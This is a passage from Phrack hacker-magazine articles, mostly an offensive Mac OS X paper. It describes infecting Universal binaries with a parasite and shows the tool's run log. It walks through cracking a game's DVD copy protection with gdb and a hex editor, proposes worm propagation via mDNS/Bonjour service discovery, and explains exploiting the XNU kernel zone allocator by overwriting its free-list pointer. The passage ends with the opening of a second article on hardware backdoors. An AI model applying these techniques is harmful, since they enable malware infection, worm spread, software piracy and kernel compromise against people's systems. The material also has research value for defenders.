#ifdef IMGPF_POWERPC
        { exec_powerpc32_imgact,        "PowerPC binary" },
#endif  /* IMGPF_POWERPC */
        { exec_shell_imgact,            "Interpreter Script" },
        { NULL, NULL}
};
The following code from the execve() system call loops 
through each of the elements in this array and calls 
the function pointer for each one. A pointer to the 
start of the image is passed to it. 

execve(struct proc *p, struct execve_args *uap, register_t *retval)

        for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) {

                error = (*execsw[i].ex_imgact)(imgp);

Each of the functions parses the file to determine
if the file is of the appropriate architecture type.
The function which is responsible for matching and
parsing Universal binaries is the "exec_fat_imgact"
function.
The declaration of this function is below:

/*
 * exec_fat_imgact
 *
 * Image activator for fat 1.0 binaries.  If the binary is fat, then we
 * need to select an image from it internally, and make that the image
 * we are going to attempt to execute.  At present, this consists of
 * reloading the first page for the image with a first page from the
 * offset location indicated by the fat header.
 *
 * Important:   This image activator is byte order neutral.
 *
 * Note:    If we find an encapsulated binary, we make no assertions
 *          about its validity; instead, we leave that up to a rescan
 *          for an activator to claim it, and, if it is claimed by one,
 *          that activator is responsible for determining validity.
 */
static int
exec_fat_imgact(struct image_params *imgp)

The first thing this function does is test the 
magic number at the top of the file. The following
code does this.

        /* Make sure it's a fat binary */
        if ((fat_header->magic != FAT_MAGIC) &&
            (fat_header->magic != FAT_CIGAM)) {
                error = -1;
                goto bad;
        }

The fatfile_getarch_affinity() function is then 
called to search the universal binary for a 
Mach-O file with the appropriate architecture 
type for the system.

   /* Look up our preferred architecture in the fat file. */
        lret = fatfile_getarch_affinity(imgp->ip_vp,
                                        (p->p_flag & P_AFFINITY));

This function is defined in the file: 

fatfile_getarch_affinity(
                struct vnode            *vp,
                vm_offset_t             data_ptr,
                struct fat_arch         *archret,
                int                     affinity)

This function searches each of the Mach-O files within the 
Universal binary. A host has a primary and secondary architecture. 
If during this search, a Mach-O file is found which matches
the primary architecture type for the host, this file is 
used. If, however, the primary architecture type is not 
found, yet the secondary type is found, this will be used.
This is useful when infecting this format.

Once an appropriate Mach-O file has been located the imgp
ip_arch_offset and ip_arch_size attributes are updated to
reflect the new position in the file.

/* Success.  Indicate we have identified an encapsulated binary */
error = -2;
imgp->ip_arch_offset = (user_size_t)fat_arch.offset;
imgp->ip_arch_size = (user_size_t)fat_arch.size;

After this fatfile_getarch_affinity() simply returns and lets
execve() continue walking the execsw[] struct array to find 
an appropriate loader for the new file.

This logic means that it does not really matter if the 
true architecture type of the file matches up with the 
architecture specified in its fat_arch struct within
the Universal binary. Once a Mach-O file is chosen it will
be treated as a fresh binary.

The method which I propose to infect Universal binaries 
utilizes this behavior. A breakdown of this method is
as follows:

1) Determine the primary and secondary architecture types
   for the host machine.
2) Parse the fat_header struct of the host binary.
3) Walk through the fat_arch structs and locate the 
   struct for the secondary architecture type.
4) Check that the size of the parasite is smaller than the 
   secondary architecture Mach-O file in the Universal binary.
5) Copy the parasite binary directly over the secondary arch
   binary inside the universal binary.
6) Locate the primary architecture's fat_arch structure.
7) Modify the architecture type field in this structure to a dummy
   value (0xdeadbeef) which will not match any real architecture.

Now when the binary is executed, the primary architecture 
is not found. Due to this, the secondary architecture is 
used. The imgp is set to point to the offset in the file
containing our parasite, and this is executed as expected.
The parasite then opens its own binary (which is quite 
possible on Mac OS X) and performs a linear search for 
0xdeadbeef. It then modifies this value, changing it back
to the primary architecture type, and execve()'s its own file.

Some sample code has been provided with this paper that 
demonstrates this method on Intel architecture. The code 
unipara.c will copy an Intel architecture Mach-O file
over the PowerPC Mach-O file inside a Universal binary.
After infection has occurred the size of the host file
remains unchanged.

-[nemo@fry:~/code/unipara]$ ./unipara host parasite
-[nemo@fry:~/code/unipara]$ ./host
uid=501(nemo) gid=501(nemo) 
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./unipara parasite host
[+] Initiating infection process.
[+] Found: 2 arch structs.
[+] We are good to go, attaching parasite.
[+] parasite implanted at offset: 0x6000
[+] Switching arch types to execute our parasite.
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./host
Hello, World!
uid=501(nemo) gid=501(nemo) 

If residency is required after the payload has already been
executed, the parasite can simply fork() before modifying 
its binary. The parent process can then execve() while the child
waits and then returns the architecture type to 0xdeadbeef.

--[ 8 - Cracking Example - Prey

Recently, during an extra long stopover in LAX airport (the most
boring airport in the entire world) I decided I would pass the 
time by playing the game "Prey" which I had installed onto my 

To my horror, when I tried to start up my game, I was greeted 
with the following error message:

"Please insert the disc "Prey" or press Quit."
"Veuillez inserer le disque "Prey" ou appuyer sur Quitter."
"Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie
auf Beenden."

Since I had nothing better to do, I decided to spend some 
time removing this error message. First things first I
determined the object format of the executable file.

-[nemo@fry:/Applications/Prey/]$ file Prey
Prey: Mach-O universal binary with 2 architectures
Prey (for architecture ppc):    Mach-O executable ppc
Prey (for architecture i386):   Mach-O executable i386

The Prey executable is a Universal binary containing a 
PowerPC and an i386 Mach-O binary. 

Next I ran the otool -o command to determine if the code
was written in Objective-C. The output from this command
shows that an Objective-C segment is present in the file.

-[nemo@largeprompt]$ otool -o Prey | head -n 5
Objective-C segment
Module 0x27ef458
    version 6
           size 16

I then used the "class-dump" command [14] to dump the 
class definitions from the file. Probably the most
interesting of which is shown below:

	@interface DOOMController (Private)
	- (void)quakeMain;
	- (BOOL)checkRegCodes;
	- (BOOL)checkOS;
	- (BOOL)checkDVD;

Most games on Mac OS X are 10 years behind their Windows
counterparts when it comes to copy protection. Typically
the developers don't even strip the file and symbols are 
still present. Because of this fact, I fired up gdb and 
put a breakpoint on the main function.

	(gdb) break main
	Breakpoint 1 at 0x96b64

However when I executed the file the error message was
displayed prior to my breakpoint in main being reached.
This led me to the conclusion that a constructor 
function was responsible for the check. 

To validate this theory I ran the command "otool -l" on
the binary to list the load commands present in the file.
(The Mach-O Runtime Document [4] explains the load_command
struct clearly).

Each section in the Mach-O file has a "flags" value 
associated with it. This describes the purpose of the 
section. Possible values for this flags variable are
found in the file: /usr/include/mach-o/loader.h.

The value which represents a constructor section is 
defined as follows:

/* section with only function pointers for initialization*/
#define S_MOD_INIT_FUNC_POINTERS        0x9     

Looking through the "otool -l" output there is only one
section which has the flags value: 0x9. This section is
shown below:

  sectname __mod_init_func
   segname __DATA
      addr 0x00515cec
      size 0x00000380
    offset 5328108
     align 2^2 (4)
    reloff 0
    nreloc 0
     flags 0x00000009
 reserved1 0
 reserved2 0

Now that the virtual address of the constructor section
for this application was known, I simply fired up gdb
again and put breakpoints on each of the pointers 
contained in this section.

(gdb) x/x 0x00515cec
0x515cec <_ZTI14idSIMD_Generic+12>:     0x028cc8db
0x515cf0 <_ZTI14idSIMD_Generic+16>:     0x00495852
0x515cf4 <_ZTI14idSIMD_Generic+20>:     0x0049587c

(gdb) break *0x028cc8db
Breakpoint 1 at 0x28cc8db
(gdb) break *0x00495852
Breakpoint 2 at 0x495852
(gdb) break *0x0049587c
Breakpoint 3 at 0x49587c

I then executed the program. As expected the first break point
was hit before the error message box was displayed.

(gdb) r
Starting program: /Applications/Prey/ 

Breakpoint 1, 0x028cc8db in dyld_stub_log10f ()
(gdb) continue

I then continued execution and the error message appeared. This
happened before the second breakpoint was reached. This indicated
that the first pointer in the __mod_init_func was responsible for 
the DVD checking process.

In order to validate my theory I restarted the process. This time 
I deleted all breakpoints except the first one.

(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x028cc8db
Breakpoint 4 at 0x28cc8db

(gdb) r
Starting program: /Applications/Prey/ 
Reading symbols for shared libraries . done

Once the breakpoint is reached, I simply "return" from the 
constructor, without testing for the DVD.

Breakpoint 4, 0x028cc8db in dyld_stub_log10f ()
(gdb) ret
Make selected stack frame return now? (y or n) y
#0  0x8fe0fcc4 in  _dyld__ZN16ImageLoaderMachO16doInitialization... ()

And then continue execution.

(gdb) c

The error message was gone and Prey started up as if the DVD 
was in the drive, SUCCESS! After playing the game for about 10
minutes and running through the same boring corridor over and 
over again I decided it was more fun to continue cracking the
game than to actually play it. I exited the game and returned 
to my shell.

In order to modify the binary I used the HT Editor [15].
Before I could use HTE to modify this file however, I had to
extract the appropriate architecture for my system from the
Universal binary. I accomplished this using the ditto command
as follows.

-[nemo@fry:/Prey/]$ ditto -arch i386 Prey Prey.i386
-[nemo@fry:/Prey/]$ cp Prey Prey.backup
-[nemo@fry:/Applications/Prey/]$ cp Prey.i386 Prey

I then loaded the file in HTE. I pressed F6 to select the mode
and chose the Mach-O/header option. I then scrolled down to
find the __mod_init_func section. This is shown as follows:

**** section 3 ****                                              
section name                                      __mod_init_func         
segment name                                      __DATA                  
virtual address                                   00515cec                
virtual size                                      00000380                
file offset                                       00514cec                
alignment                                         00000002                
relocation file offset                            00000000                
number of relocation entries                      00000000                
flags                                             00000009                
reserved1                                         00000000                
reserved2                                         00000000              

In order to skip the first constructor I simply added four
bytes to the virtual address field, and subtracted four 
bytes from the size. I did this by pressing F4 in HTE and 
typing the values. Here are the new values:

**** section 3 ****                                             
section name                                      __mod_init_func         
segment name                                      __DATA                  
virtual address                                   00515cf0 <== += 4     
virtual size                                      0000037c <== -= 4     
file offset                                       00514cec                
alignment                                         00000002                
relocation file offset                            00000000                
number of relocation entries                      00000000                
flags                                             00000009                
reserved1                                         00000000                
reserved2                                         00000000               

I then saved this new binary and executed it, again Prey
started up fine without mentioning the missing DVD.

Finally I repeated this process for the PowerPC binary
and packed the two back together into a Universal binary
using the lipo command.

--[ 9 - Passive malware propagation with mDNS

As I'm sure all of you are aware, the only reason for the
lack of malware on Mac OS X is the lack of market share
(and therefore the lack of people caring).

In this section I propose a way to remedy this. This method
utilizes one of the default services which ships on Mac OS X
10.4 at the time of writing: mDNSResponder. 

The mDNSResponder service is an implementation of the 
multicast DNS protocol. This protocol is documented
thoroughly by several of the documents linked from [17].
Also if you're interested in the protocol it makes sense
to read the RFC [18].

At a packet level the multicast DNS protocol is very similar
to regular DNS. It also serves a similar (yet different) 
purpose: mDNS is used to create a way for hosts on a LAN
to automagically configure their network settings and begin
communication without a DHCP server on the network. It is 
also designed to allow the services on a network to be
enumerated and browsed without prior configuration.

Recently, mDNS implementations have been shipping for a large
variety of operating systems, including Mac OS X, Vista, Linux
and a variety of hardware devices such as printers. The mDNS
implementation which is packaged with Mac OS X is called
Bonjour.

Bonjour contains a useful API for registering and browsing
services advertised by mDNS. The daemon mDNSResponder is
responsible for all the network communication via a mach port
named "" that is made available to the 
system for communication with the daemon. The documentation
for the API which is used to manipulate this daemon is found 
at [19]. 

The command line tool /usr/bin/mdns also exists for manipulating 
the mDNSResponder daemon directly [20]. This tool has the
following usage:

-[nemo@fry:~]$ mdns
mdns -E                  (Enumerate recommended registration domains)
mdns -F                      (Enumerate recommended browsing domains)
mdns -B        <Type> <Domain>        (Browse for services instances)
mdns -L <Name> <Type> <Domain>           (Look up a service instance)
mdns -R <Name> <Type> <Domain> <Port> [<TXT>...] (Register a service)
mdns -A                      (Test Adding/Updating/Deleting a record)
mdns -U                                  (Test updating a TXT record)
mdns -N                             (Test adding a large NULL record)
mdns -T                            (Test creating a large TXT record)
mdns -M      (Test creating a registration with multiple TXT records)
mdns -I   (Test registering and then immediately updating TXT record)

Here is an example demonstrating using this tool to look for
SSH services on the local network:

-[nemo@fry:~]$ mdns -B _ssh._tcp. 
Browsing for _ssh._tcp.local
Talking to DNS SD Daemon at Mach port 3843
Timestamp     A/R Flags Domain              Service Type     Instance Name
11:16:45.816  Add     1 local.              _ssh._tcp.               fry

As you can see, this functionality would be very useful for 
malware installed on a new host. 

Once a worm has compromised a new host, it must then scan for
new targets to attack. This scanning is one of the most common
ways for a worm to be detected on a network. In the case of 
Mac OS X, where a large amount of scanning would be required to
find a single target, detection is even more likely.

We can use the Bonjour API to wait silently for a service to 
advertise itself to our code, then infect the target as 
necessary. This will greatly reduce the network traffic 
required for worm propagation.

The header file which contains the definition for the structs
and functions needed is /usr/include/dns_sd.h. The functions
needed are contained within libSystem and are therefore linked
with almost every binary on the system. This is good news if you
have just infected a new process and wish to perform the mDNS
lookup from inside its address space.

The Bonjour API allows us to register a service, enumerate 
domains, as well as many other useful things. I will only 
focus on browsing for an instance of a particular type of 
service in this paper, however. This is a relatively 
straightforward process. 

The first function needed to find an instance of a service is the
DNSServiceBrowse() function (shown below).

DNSServiceErrorType DNSServiceBrowse ( 
    DNSServiceRef *sdRef, 
    DNSServiceFlags flags, 
    uint32_t interfaceIndex, 
    const char *regtype, 
    const char *domain, /* may be NULL */
    DNSServiceBrowseReply callBack, 
    void *context /* may be NULL */
);

The arguments to this are fairly straightforward. We simply 
pass an uninitialized DNSServiceRef pointer, followed by an
unused flags argument. The interfaceIndex specifies the 
interface on which to perform the query. Setting this to 0 
results in the query being broadcast on all interfaces. The
regtype field is used to specify the type of service we wish
to browse for. In our example we will search for ssh, so the 
string "_ssh._tcp" is used to specify ssh over tcp. Next the
domain argument is used to specify the logical domain we wish 
to browse. If this argument is NULL, the default domains are 
used. Finally a callback must be supplied in order to indicate
what to do once an instance is found. This function can include
our infection/propagation code. 

Once the call to DNSServiceBrowse() has been made, the function
DNSServiceProcessResult() must be used to begin processing.

This function simply takes the sdRef, initialized from the 
first call to DNSServiceBrowse(), and calls the callback 
function when results are received. It will block until 
finding an instance. 

Once a service is found, it must be resolved to an IP address
and port so it can be infected.

To do this the DNSServiceResolve() function can be used.
This function is very similar to the DNSServiceBrowse()
function, however a DNSServiceResolveReply() callback
is used. Also the name of the service must already be
known. The function prototype is as follows:

	DNSServiceErrorType DNSServiceResolve ( 
	    DNSServiceRef *sdRef, 
	    DNSServiceFlags flags, 
	    uint32_t interfaceIndex, 
	    const char *name, 
	    const char *regtype, 
	    const char *domain, 
	    DNSServiceResolveReply callBack, 
	    const char *domain, 
	    DNSServiceResolveReply callBack, 
	    void *context /* may be NULL */
	);

The callback for this function receives the following
arguments:

	DNSServiceResolveReply resolve_target(
	    DNSServiceRef sdRef,
	    DNSServiceFlags flags,
	    uint32_t interfaceIndex,
	    DNSServiceErrorType errorCode,
	    const char *fullname,
	    const char *hosttarget,
	    uint16_t port,
	    uint16_t txtLen,
	    const char *txtRecord,
	    void *context
	);

Once again we must call the DNSServiceProcessResult() 
function, passing the sdRef received from DNSServiceResolve
to begin processing. 

Once within the callback, the port which the service runs
on is passed in as a short in network byte order. 

Retrieving the IP address is simply a case of calling
gethostbyname() on the hosttarget argument.

I have included some code in the Appendix (discover.c)
which demonstrates this clearly. This code can sit in a
loop to enumerate each of the services and infect them.

Opensshd warez not included. ;-)

--[ 10 - Kernel Zone Allocator exploitation

A zone allocator is a memory allocator which is designed 
for efficient allocation of objects of identical size. 

In this section I will look at how the mach zone allocator
(the zone allocator used by the XNU kernel) works. Then I 
will look at how an overflow into the pages used by the zone 
allocator can be exploited.

The source for the mach zone allocator is located in the file 

Some of the objects in the XNU kernel which use the mach zone 
allocator for allocation are: the task structs, the thread 
structs, the pipe structs, and the zone structs themselves.

A list of the current zones on the system can be retrieved 
from userspace using the host_zone_info() function. Mac OS X
ships with a tool which takes advantage of this:


This tool displays each of the zones and their element size,
current size, max size etc. Here is some sample output from
running this program.

elem    cur    max    cur    max   cur alloc alloc
zone name                size   size   size  #elts  #elts inuse  size count
zones                    80    11K    12K    152    153    95    4K    51  
vm.objects              136  3609K  3888K  27180  29274 21116    4K    30 C
vm.object.hash.entries   20   374K   512K  19176  26214 17674    4K   204 C
tasks                   432    59K   432K    141   1024   113   20K    47 C
threads                 868   329K  2172K    389   2562   295   56K    66 C
uthreads                296   114K   740K    396   2560   296   16K    55 C
alarms                   44     3K     4K     93     93     2    4K    93 C
load_file_server         36    56K   492K   1605  13994  1605    4K   113  
mbuf                    256     0K  1024K      0   4096     0    4K    16 C
socket                  344    38K  1024K    114   3048    75   20K    59 C

It also gives you a chance to see some of the different types
of objects which utilize the zone allocator.

Before I demonstrate how to exploit an overflow into these
zones, we will first look at how the zone allocator functions.

When the kernel wishes to start allocating objects within a zone
the zinit() function is first called. This function is used to
allocate the zone which will contain each member of that 
specific object type. The information about the newly created
zone needs a place to stay. The "struct zone" struct is used to
accommodate this information. The definition of this struct is 
shown below.

struct zone {
        int             count;          /* Number of elements used now */
        vm_offset_t     free_elements;
        decl_mutex_data(,lock)          /* generic lock */
        vm_size_t       cur_size;       /* current memory utilization */
        vm_size_t       max_size;       /* how large can this zone grow */
        vm_size_t       elem_size;      /* size of an element */
        vm_size_t       alloc_size;     /* size used for more memory */
        unsigned int
        /* boolean_t */ exhaustible :1, /* (F) merely return if empty? */
     /* boolean_t */ collectable :1, /* (F) garbage collect empty pages */
     /* boolean_t */ expandable :1,  /* (T) expand zone (with message)? */
        /* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space */
        /* boolean_t */ doing_alloc :1, /* is zone expanding now? */
   /* boolean_t */ waiting :1,     /* is thread waiting for expansion? */
/* boolean_t */ async_pending :1,   /* asynchronous allocation pending? */
        /* boolean_t */ doing_gc :1;    /* garbage collect in progress? */
        struct zone *   next_zone;      /* Link for all-zones list */
        call_entry_data_t       call_async_alloc;  
	/* callout for asynchronous alloc */
        const char      *zone_name;     /* a name for the zone */
#if     ZONE_DEBUG
        queue_head_t    active_zones;   /* active elements */
#endif  /* ZONE_DEBUG */
};

The first thing that the zinit() function does is check if there is
an existing zone in which to store the new zone struct. The 
global pointer "zone_zone" is used for this. If the mach zone
allocator has not yet been used, the zget_space() function is
used to allocate more space for the zones zone (zone_zone).

The code which performs this check is as follows:

        if (zone_zone == ZONE_NULL) {
                if (zget_space(sizeof(struct zone), (vm_offset_t *)&z)
                    != KERN_SUCCESS)
                        return(ZONE_NULL);
        } else
                z = (zone_t) zalloc(zone_zone);

If the zone_zone exists, the zalloc() function is used to 
retrieve an element from the zone. Each of the attributes
of this new zone is then populated.

        z->free_elements = 0;
        z->cur_size = 0;
        z->max_size = max;
        z->elem_size = size;
        z->alloc_size = alloc;
        z->zone_name = name;
        z->count = 0;
        z->doing_alloc = FALSE;
        z->doing_gc = FALSE;
        z->exhaustible = FALSE;
        z->collectable = TRUE;
        z->allows_foreign = FALSE;
        z->expandable  = TRUE;
        z->waiting = FALSE;
        z->async_pending = FALSE;

As you can see, the free_elements linked list is 
initialized to 0. The zinit() function returns
a zone_t pointer which is used for each allocation
of new objects with zalloc(). Before returning, 
zinit() uses the zalloc_async() function to allocate
and free a single element in the zone.

Now that the zone is set up, the zalloc() and zfree()
functions are used to allocate and free elements from 
the zone. Also zget() is used to perform a non-blocking
allocation from the zone.

Firstly I will look at the zalloc() function. zalloc()
is basically a wrapper function around the 
zalloc_canblock() function. 

The first thing zalloc_canblock() does is attempt to 
remove an element from the zone's free_elements list
and use it. The following macro (REMOVE_FROM_ZONE) is
responsible for doing this.

#define REMOVE_FROM_ZONE(zone, ret, type)                               \
MACRO_BEGIN                                                             \
        (ret) = (type) (zone)->free_elements;                           \
        if ((ret) != (type) 0) {                                        \
            if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) {      \
                panic("A freed zone element has been modified.\n");     \
            }                                                           \
            (zone)->count++;                                            \
            (zone)->free_elements = *((vm_offset_t *)(ret));            \
        }                                                               \
MACRO_END

As you can see, this macro simply returns the 
free_elements pointer from the zone struct. It
also increments the count attribute and sets the 
free_elements attribute of the zone struct to
the "next" free element. It does this by 
dereferencing the current free elements address.
This shows that the first 4 bytes of an unused 
allocation in a zone are used as a pointer to the
next free element. This will come in handy to us 
later when exploiting an overflow.

The check is_kernel_data_addr() is used to make 
sure we haven't tampered with the list. The 
definition of this check is shown below:

#define is_kernel_data_addr(a)                                          \
  (!(a) || ((a) >= vm_min_kernel_address && !((a) & 0x3)))

const vm_offset_t vm_min_kernel_address = VM_MIN_KERNEL_ADDRESS;
#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)

As you can see this simply checks that the address is 
either 0, or that it is greater than or equal to 0x1000 
(which isn't a problem at all) and word aligned. This check 
does not really cause any trouble when exploiting an overflow
as you'll see later.

If there are no free elements in the list the 
doing_alloc attribute of the zone is checked.

This attribute is used as a lock. If a blocking 
allocation is performed the allocator will sleep until 
this is unset. 

Once it is ok to allocate an element the 
kernel_memory_allocate() function is used to
allocate one. The allocation is of a fixed
size for the zone. The kernel_memory_allocate() 
function is used at the base level of pretty 
much all the memory allocators present in the
XNU kernel. It basically just uses 
vm_page_alloc() to allocate pages. Once the
zone allocator successfully calls this function
zcram() is used to break the pages up into elements
and add them to the free_elements list. Each element 
is added in the same way zfree() does, so now that 
I have looked at the allocation process I will
show the workings of zfree().

The zfree() function is used to add an element back 
to the zone free_elements list. The first thing zfree()
does is to make sure that an element is not being zfree()'ed
which was never zalloc()'ed. This is done using the 
from_zone_map() macro. This macro is defined as follows.

#define from_zone_map(addr, size) \
        ((vm_offset_t)(addr) >= zone_map_min_address && \
	         ((vm_offset_t)(addr) + size -1) <  zone_map_max_address)

In the case of an overflow however, this check is not 
particularly important so I will move on.

Next the zfree() function (if zone debugging is enabled) will
run through and check that the element did not come from
a different zone to the one which has been passed to zfree().
If this is the case a kernel panic() is thrown, alerting
the user to what the problem was.

Next zfree() runs through all the free_elements in the zones 
list and calls the pmap_kernel_va() function. The code which 
does this is as follows.

     for (this = zone->free_elements;
	     this != 0;
	     this = * (vm_offset_t *) this)
		if (!pmap_kernel_va(this) || this == elem)
			panic("zfree");

The pmap_kernel_va() check is shown below.

#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)
#define pmap_kernel_va(VA)      \
        (((VA) >= VM_MIN_KERNEL_ADDRESS) && ((VA) <= vm_last_addr))

The pmap_kernel_va check simply checks that the address
is greater than or equal to the VM_MIN_KERNEL_ADDRESS. 
This address is defined (above) as 0x1000, the start of 
the first page of valid kernel memory (straight after 
PAGEZERO). It then checks if the address is less than 
or equal to the vm_last_addr. This is defined as 
VM_MAX_KERNEL_ADDRESS (shown below).

vm_last_addr = VM_MAX_KERNEL_ADDRESS;   /* Set the highest address */
#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xFE7FFFFF)   /* ppc  */
#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xDFFFFFFF)   /* i386 */

Basically this means that almost any address within the
kernel's address space is considered valid.

Once these checks are performed, the final step zfree() does 
is to use the ADD_TO_ZONE() macro in order to add the free'ed 
element back to the free_elements list in the zone struct.

Here is the macro used to do this:

#define ADD_TO_ZONE(zone, element)                                      \
MACRO_BEGIN                                                             \
                if (zfree_clear)                                        \
                {   unsigned int i;                                     \
                    for (i=1;                                           \
                         i < zone->elem_size/sizeof(vm_offset_t) - 1;   \
                         i++)                                           \
                    ((vm_offset_t *)(element))[i] = 0xdeadbeef;         \
                }                                                       \
                ((vm_offset_t *)(element))[0] = (zone)->free_elements;  \
                (zone)->free_elements = (vm_offset_t) (element);        \
                (zone)->count--;                                        \
MACRO_END

This macro runs through the memory allocated for the 
element which is being free()'ed in 4 byte intervals.
It writes out 0xdeadbeef to each location, filling
the memory and clearing any original data. It then
writes the old free_elements pointer from the zone
struct into the first 4 bytes of the allocation.

Now that I have shown briefly how the zone allocator 
functions, I will look at what happens in the case of an
overflow.
In the diagram below you can see an element in use
followed by a free element. The first element 
contains the data used by the struct (in this 
sample case the struct is made up.)

The second element consists of the pointer to the 
free element followed by the unsigned long 
0xdeadbeef repeated to fill the struct. Both the
in use and free elements are the same size.

low memory  (0x00000000)
----( Element being overflowed )-----
  00 00 00 01
  22 22 22 22
  33 33 33 33
  00 00 00 00 
  00 00 00 00 
  00 00 00 00 
  00 00 00 00 
-----------( Free Element )----------
[ ff fc 7c 7d ]	<== Pointer to next free element.
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
high memory (0xffffffff)

In the case where a buffer within the first
in-use struct is overflowed (in this case with
capital A [0x41]), it is then possible to overwrite
the free element's "next" pointer. This is
demonstrated below.

low memory  (0x00000000)
----( Element being overflowed )-----
  00 00 00 01
  22 22 22 22
  33 33 33 33
  41 41 41 41 <== Overflow starts here
  41 41 41 41 
  41 41 41 41 
  41 41 41 41 
-----------( Free Element )----------
[ 41 41 41 41 ]	<== Overflow into pointer.
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
high memory (0xffffffff)

In this case, when the REMOVE_FROM_ZONE() macro
is used by zalloc() the user controlled address
0x41414141 will become the zone struct's new 
free_elements pointer, and consequently, be
used by the next allocation of the element type.

If this address is positioned correctly it may be
possible to have something user controlled overwrite
a useful pointer in kernel space and in this way gain
control of execution. 

Due to the checks performed by zfree(), however, it is 
recommended that efforts be taken to avoid this element 
being passed to zfree(), as this will result in a kernel 
panic().

--[ 11 - Conclusion

Hopefully if you bothered to read this far you learned 
something useful. If not, I apologize.

If you take any of these ideas and work on them further
or know of a better method to do anything covered in this
paper I'd appreciate an email letting me know at: Flames to 
please ;)

Now for the thanks. A huge thank you to my amazing fiancee pif 
for her love and support while I was writing this.
Thanks to bk for all the help and long conversations about XNU. 
Thanks to everyone at felinemenace for all the support, code 
and fun times. Also a big thank you to my computer for not 
kernel panic()'ing for a third time during the process of 
saving this paper. I think if you had written random bytes 
over the paper a third time I wouldn't have had the stamina 
to rewrite (again).

Finally, this paper isn't complete without another bad Star 
Wars pun to match the title so here we go....

May the fork()'s be with root...

--[ 12 - References

[1] b-r00t's Smashing the Mac for Fun & Profit  
[2] Smashing The Kernel Stack For Fun And Profit 
[3] Linux on-the-fly kernel patching without LKM
[4] Mach-O Runtime ...
[5] Understanding windows shellcode
[6] Smashing The Kernel Stack For Fun And Profit
[7] Ilja's blackhat talk - ...
[8] Mac OS X PPC Shellcode Tricks -
[9] Smashing the Stack for Fun and Profit -
[10] Radical Environmentalists by Netric -
[11] Non eXecutable Stack Lovin on OSX86 -
[12] Mach-O Infection -
[13] Infecting Mach-O Files
[14] class-dump
[15] HTE -
[16] Architecture Spanning Shellcode -
[17] Multicast DNS -
[18] mDNS RFC	-
[19] mDNS API -
[20] mdns command line utility -
[21] KUNC Reference -

--[ 13 - Appendix - Code

Extract this code with uudecode. 

begin 644 code.tgz


              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 12              (* *)
            | - |                                            | - |
            |   |       Hacking deeper in the system         |   |
            |   |                                            |   |
            |   |               by scythale                  |   |
            |   |                                            |   |
            |   |                                            |   |


	1.  Abstract
	2.  A quick introduction to I/O system
	3.  Playing with GPU
	4.  Playing with BIOS
	5.  Conclusion
	6.  References
	7.  Thanks

1.  Abstract

     Today, we're observing a growing number of papers focusing on hardware
hacking. Even if hardware-based backdoors are far from being a good
solution to use in the wild, this topic is very important as some big
corporations are planning to take control of our computers without our
consent using some really badly designed concepts such as DRM and TCPA.
As we can't let them do this at any cost, the time has come for a little
introduction to the hardware world...

     This paper constitutes a tiny introduction to hardware hacking from
the backdoor writer's perspective (hey, this is phrack, I'm not going to
explain how to pilot your coffee machine with a RS232 interface). The
thing is, even if backdooring hardware isn't such a good idea, it is a
good way to start in hardware hacking. The aim of the author is to give
readers the basics of hardware hacking which should be useful to prepare
for the fight against TCPA and other crappy things sponsored by big
sucke... erm... "companies" such as Sony and Microsoft.

     This paper is i386 centric. It does not cover any other architecture,
but it can be used as a basis for research on other hardware. Thus
bear in mind that most of the material presented here won't work on any
other machine than a PC. Subjects such as devices, BIOS and internal work
of a PC will be discussed and some ideas about turning all these things to
our own advantage will be presented.

     This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,
so you won't find a fully functional backdoor here. The aim of the author
is to provide information that would help you in writing your own stuff,
not to provide you with already finished work. This subject isn't a
particularly difficult one; all it takes is imagination.

     In order to understand this article, some knowledge about x86 assembly
and architecture is heavily recommended. If you're a newbie to these
subjects, I strongly recommend you to read "The Art of Assembly
Programming" (see [1]).

2.  A quick introduction to I/O system

     Before digging straight into the subject, some explanations must be
done. Those of you who already know how I/O works on Intel CPUs and what
it's there for might just prefer to skip to the next section. Others,
just keep on reading. 

     As this paper focuses on hardware, it would be practical to know how
to access it. The I/O system provides such an access. As everybody knows,
the processor (CPU) is the heart, or, more accurately, the brain of the
computer. But the only thing it does is to compute. Basically, a CPU isn't
of much help without devices. Devices give data to be computed to the CPU,
and allow it to bring back an answer to our requests. The I/O system is
used to link most of devices to the CPU. The way processors see I/O based
devices is quite the same as the way they see memory. In fact, all the
processors do to communicate with devices is to read and write data
"somewhere in memory" : the I/O system is charged to handle the next steps.
This "somewhere in memory" is represented by an I/O port. I/O ports are
special "addresses" that connects the CPU data bus to the device. Each I/O
based device uses at least one I/O port, many of them using several. 
Basically, the only thing device drivers do is to manipulate I/O ports
(well, very basically, that's what they do, just to communicate with
hardware). The Intel Architecture provides three main ways to manipulate
I/O ports : memory-mapped I/O, Input/Output mapped I/O and DMA.

      memory-mapped I/O

   The memory-mapped I/O system allows I/O ports to be manipulated as if
they were basic memory. Instructions such as 'mov' are used to interface with
it. This system is simple : all it does is to map I/O ports to memory
addresses so that when data is written/read at one of these addresses, the
data is actually sent to/received by the device connected to the
corresponding port. Thus, the way to communicate with a device is the same
as communicating with memory.

      Input/Output mapped I/O

   The Input/Output mapped I/O system uses dedicated CPU instructions to
access I/O ports. On i386, these instructions are 'in' and 'out':

       in 254, reg   ; writes content of reg register to port #254

       out reg, 254  ; reads data from port #254 and stores it in reg

    The only problem with these two instructions is that the port is
8 bit-encoded, allowing only an access to ports 0 to 255. The sad thing is
that this range of ports is often connected to internal hardware such as
the system clock. The way to circomvent it is the following (taken from
"The Art of Assembly Programming, see [1]) :

To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
address into the DX register and use DX as a pointer to the specified I/O
